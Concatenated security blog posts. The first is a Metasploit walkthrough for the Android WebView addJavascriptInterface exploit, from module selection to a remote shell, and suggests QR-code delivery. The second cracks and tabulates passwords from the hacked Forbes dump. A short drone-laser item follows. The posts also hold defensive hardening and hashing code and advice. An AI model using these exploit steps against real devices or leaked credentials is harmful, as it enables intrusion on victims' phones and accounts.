Android Webview Exploit Tutorial (70% of Devices Vulnerable!)

Around 70% of all Android devices in the field are subject to a Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code.

Called the “Android WebView addJavascriptInterface Vulnerability”, it works when untrusted Javascript code is executed by a WebView on Android devices.

And here is the kicker, about 70% of Android devices (phones and tablets) are vulnerable to it!

This month Rapid7 added the exploit as a Metasploit Module, so let’s take a look at it using Kali Linux and Metasploit:

1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt.

2. Type, “use exploit/android/browser/webview_addjavascriptinterface”.

3. Then type, “show options” to see what needs to be set:

Use Exploit

For the most part, you are good to go. You can turn on SSL, or change the port or host address, if you want. But one variable I did change was URIPATH. By default it is random, so I changed it to something easier to type in.

“Security” sounded reassuring.

4. Enter, “set URIPATH Security”:

Set UriPath Exploit

5. Finally, type “exploit”:

Exploit

A server is started on the Kali system that hosts a webpage containing the exploit. A URL is provided including the URI path.

Now if a vulnerable Android device surfs to our Metasploit module, sitting at 192.168.1.16:8080/Security in this demo, you get a remote session:

Session created

Now just connect to the session using “sessions -i 1”:

Interacting with session

And that is it! You are connected to the Android device.

But on one Android Tablet that I tested, something didn’t seem right. It allowed me to run some Linux commands but not others. I could use “pwd” to see the current directory that I was in, and I could surf to other directories with “cd”, but the “ls” and other commands would not work:

LS not found

Whenever I ran “ls”, to view the files in the directory, I would get a “<stdin>[2]: ls: not found” error.

A quick check of the path with “echo $PATH” revealed that no path was set:

Echo Path

So I set it by typing, “export PATH=/system/bin:$PATH”:

Once the path was correctly set to point to the system files, “ls” and other commands worked without issue:

export path

As you can see, I had a complete remote shell to the Android device.

All I had to do was visit a malicious page using the built-in Browser and the exploit ran with no further warning or input from the Android device. To make matters worse, the URL could be printed as a QR Code so that once it is scanned, it automatically goes to the malicious page for true “click and pwn”.

So what can you do to protect yourself against this type of attack?

The exploit only works on versions of Android below 4.2, which apparently is 70% of current devices…

Update your device to the latest version of Android (if it will update), check with your manufacturer for instructions.

Also, never scan in QR Codes from unknown sources.

But I did notice that one device I tested wasn’t 4.2, it was a 4.0 version – and it was not vulnerable. But I remembered that the Android Browser did have an update that I downloaded before testing.

Not sure if this will be true for all devices, again the best course of action would be to update to the latest OS version.
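For app developers, the fix sits on the app side of the same bug: on Android 4.2 (API 17) and later only methods annotated with @JavascriptInterface are reachable from page JavaScript, provided the app targets API 17 or higher, while older devices get no bridge at all. This is an added example of hypothetical app code, not from the post or the Metasploit module; the class names and the origin URL are placeholders.

```java
import android.annotation.SuppressLint;
import android.app.Activity;
import android.os.Build;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;
import android.webkit.WebViewClient;

// Hypothetical app code (added example, not from the post or the Metasploit module).
public class HardenedWebViewActivity extends Activity {

    // The Java object page scripts may call. On Android 4.2+ (API 17) only methods carrying
    // @JavascriptInterface are reachable, and only if the app's targetSdkVersion is >= 17.
    static final class AppBridge {
        @JavascriptInterface
        public String appVersion() { return "1.0"; }
        // Unannotated: invisible to page JS on 4.2+. Before 4.2 every public method, including
        // those inherited from Object, was reachable through reflection, which is the bug above.
        public void internalOnly() { }
    }

    @SuppressLint("SetJavaScriptEnabled")
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView wv = new WebView(this);
        setContentView(wv);
        // Older system WebViews inject a bridge of their own; remove it (API 11+).
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.HONEYCOMB) {
            wv.removeJavascriptInterface("searchBoxJavaBridge_");
        }
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {
            wv.getSettings().setJavaScriptEnabled(true);
            wv.addJavascriptInterface(new AppBridge(), "app");
        } else {
            // Pre-4.2 device: the annotation is not enforced, so register no bridge and keep JS off.
            wv.getSettings().setJavaScriptEnabled(false);
        }
        // Only render content the app controls, over TLS; refuse navigation anywhere else.
        final String origin = "https://app.example.invalid/";   // placeholder origin
        wv.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                return !url.startsWith(origin);   // true = block the load
            }
        });
        wv.loadUrl(origin);
    }
}
```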

Want to learn a lot more about Kali Linux and Metasploit? Check out my new book, “Basic Security Testing with Kali Linux”.

Analysis of Forbes Passwords Dumped by the SEA

SEA Forbes

Recently the Syrian Electronic Army (SEA) hacked the news site Forbes and publicly dumped more than a million records from their WordPress site. As usual we will take a look at this dump with the analysis program “Pipal”.

This password dump was a little different than the ones that we have seen in the past. As explained on Sophos’ Naked Security site, the passwords were stored as salted hashes in the PHPass Portable format, as seen below:

You can see from this example picture from Sophos that each password is stored as a hash, and that each account also includes what is called a “salt”.

The hashes that we have looked at in the past didn’t have a salt. A salt is basically a random value mixed in when the hash is created, so that each hash is unique even when two accounts use the same password.

This makes cracking the passwords a lot more time consuming. Before, all we needed to do was crack one hash, and every other hash of the same password was cracked along with it.

Not so with salted passwords: every hash is unique, so we have to crack each and every one individually.

So, to attempt to crack the entire million-plus password hashes would have taken something like 10 years. So, for time and sanity’s sake, I pulled about 20,000 hashes randomly from throughout the dump.

It still took several hours to work through this list.

Where I have seen cracking speeds in the thousands per minute with unsalted hashes, this time it averaged about 15 per minute!
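The salted PHPass portable format described above, as an added example written from the published phpass algorithm (not code from the post, Sophos or Forbes): it shows why the same password yields two unrelated hashes under two salts, and why every guess costs thousands of MD5 rounds. The two salt strings in main are constructed; the "$P$B" round count is what WordPress writes, and the final vector is phpass’ own test value.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

// Added example: PHPass "portable" hashing ($P$...), the format Sophos showed for this dump.
// Written from the published phpass algorithm; not the post's, Forbes' or WordPress' code.
public final class PhpassPortable {
    static final String ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

    // phpass' own base64 variant (not RFC 4648): the 16 MD5 bytes become 22 characters.
    static String encode64(byte[] in) {
        StringBuilder out = new StringBuilder();
        int i = 0, n = in.length;
        while (i < n) {
            int value = in[i++] & 0xff;
            out.append(ITOA64.charAt(value & 0x3f));
            if (i < n) value |= (in[i] & 0xff) << 8;
            out.append(ITOA64.charAt((value >> 6) & 0x3f));
            if (i++ >= n) break;
            if (i < n) value |= (in[i] & 0xff) << 16;
            out.append(ITOA64.charAt((value >> 12) & 0x3f));
            if (i++ >= n) break;
            out.append(ITOA64.charAt((value >> 18) & 0x3f));
        }
        return out.toString();
    }

    // setting = "$P$" + one ITOA64 char (log2 of the round count) + 8-char salt; the stored hash
    // is that 12-char prefix plus the encoded digest. WordPress uses "$P$B": 2^13 = 8192 rounds.
    static String hash(String password, String setting) throws Exception {
        if (!(setting.startsWith("$P$") || setting.startsWith("$H$")) || setting.length() < 12)
            throw new IllegalArgumentException("not a PHPass portable setting");
        int countLog2 = ITOA64.indexOf(setting.charAt(3));
        if (countLog2 < 7 || countLog2 > 30) throw new IllegalArgumentException("bad round count");
        byte[] pw = password.getBytes(StandardCharsets.UTF_8);
        MessageDigest md5 = MessageDigest.getInstance("MD5");
        md5.update(setting.substring(4, 12).getBytes(StandardCharsets.US_ASCII)); md5.update(pw); // salt, then password
        byte[] h = md5.digest();
        for (int round = 1 << countLog2; round > 0; round--) {   // every guess costs this many MD5s
            md5.update(h); md5.update(pw);
            h = md5.digest();
        }
        return setting.substring(0, 12) + encode64(h);
    }

    public static void main(String[] args) throws Exception {
        // Constructed salts: one password, two unrelated hashes, so cracking one says nothing about the other.
        String a = hash("millenium", "$P$BaaaaaaaA"), b = hash("millenium", "$P$BbbbbbbbB");
        System.out.println(a + "\n" + b + "\nsame hash? " + a.equals(b));
        String stored = "$P$9IQRaTwmfeRo7ud9Fh4E2PdI0S3r.L0";   // phpass' own test vector, password "test12345"
        System.out.println(hash("test12345", stored).equals(stored));
    }
}
```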

So, without further ado, here are some of the results:

Top 25 passwords

millenium = 761 (4.32%)
123456 = 597 (3.39%)
password = 351 (1.99%)
q1w2e3r4 = 266 (1.51%)
123456789 = 142 (0.81%)
abc123 = 97 (0.55%)
12345678 = 92 (0.52%)
qwerty = 91 (0.52%)
987654321 = 76 (0.43%)
111111 = 68 (0.39%)
0 = 59 (0.33%)
sunshine = 56 (0.32%)
letmein = 51 (0.29%)
password1 = 48 (0.27%)
passw0rd = 44 (0.25%)
baseball = 43 (0.24%)
monkey = 42 (0.24%)
1qaz2wsx = 41 (0.23%)
abcd1234 = 41 (0.23%)
123123 = 40 (0.23%)
success = 38 (0.22%)
Password1 = 35 (0.2%)
welcome = 34 (0.19%)
1234567 = 34 (0.19%)
maggie = 33 (0.19%)

Password length (length ordered)

1 = 61 (0.35%)
2 = 2 (0.01%)
3 = 5 (0.03%)
4 = 125 (0.71%)
5 = 246 (1.4%)
6 = 7075 (40.13%)
7 = 3421 (19.41%)
8 = 4283 (24.3%)
9 = 1913 (10.85%)
10 = 390 (2.21%)
11 = 99 (0.56%)
12 = 9 (0.05%)

Length and Complexity

One to six characters = 7514 (42.62%)
One to eight characters = 15218 (86.32%)
More than eight characters = 2411 (13.68%)

Only lowercase alpha = 13198 (74.87%)
Only uppercase alpha = 7 (0.04%)
Only alpha = 13205 (74.9%)
Only numeric = 1862 (10.56%)

Conclusion

Granted, we only cracked a small portion of the list due to time constraints (because the hashes were salted), but the results look very similar to what we have seen in the past.

The top 25 passwords used, length and complexity still seem very consistent with other password dumps that we have analyzed.

The majority of passwords used were 6 to 9 characters in length and used only lowercase letters.

For better security, use long, complex passwords incorporating random upper- and lowercase letters, numbers and symbols. Also, use a different complex password for every server or website that you use, in case passwords are compromised as in this case.

Ukraine Police try to Blind Drone with Laser

Ukraine police try to blind drone cameras during violent struggle in Maidan Square.

I don’t mean to belittle what is going on in Ukraine in any way, but this video caught my attention from a technical standpoint.

First of all, remote drones are being used to capture images that show proof of what is happening in that country. And secondly, the police force purposefully tried to blind the drone camera by shining a laser at it.

We will see drones used a lot more in the future to capture events like this, and I am sure opposition forces will increase tactics to either disable or destroy them.